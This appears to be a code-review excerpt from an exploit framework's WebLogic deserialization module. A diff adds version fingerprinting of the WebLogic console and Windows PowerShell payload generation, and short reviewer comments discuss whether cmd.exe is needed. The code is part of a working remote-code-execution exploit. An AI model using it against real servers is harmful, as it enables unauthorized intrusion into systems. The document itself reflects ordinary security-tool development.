modules/exploits/multi/misc/weblogic_deserialize.rb

```diff
@@ -48,10 +56,48 @@ def initialize(info={})
       'DisclosureDate' => 'Apr 17 2018'))
   end
 
+  def check
+    connect
+    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+    req << "Host: #{peer}\n\n"
+    sock.put(req)
+
+    res = sock.get_once
+    disconnect
+    return CheckCode::Unknown unless res
+
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    if version
+      version = Gem::Version.new(version)
+      vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
+
+      case
+      when version.to_s.start_with?('10.3')
+        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+      when version.to_s.start_with?('12.1')
+        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+      when version.to_s.start_with?('12.2')
+        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
+      end
+    end
+
+    if res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
   def gen_resp
-    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
-    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
-    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+    if target.name == 'Windows'
+      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      pwrshl.gsub!("%COMSPEC%", "cmd.exe")
```

Comment:
Have you tried this with `remove_comspec`? It'd run `powershell.exe` directly. Is `cmd.exe` necessary?

Reply:
If I have a snapshot available I'll verify. cmd.exe probably isn't necessary.

Reply:
I don't have a snapshot saved but I've set this thing up multiple times already.
Once more shouldn't be too bad... 😢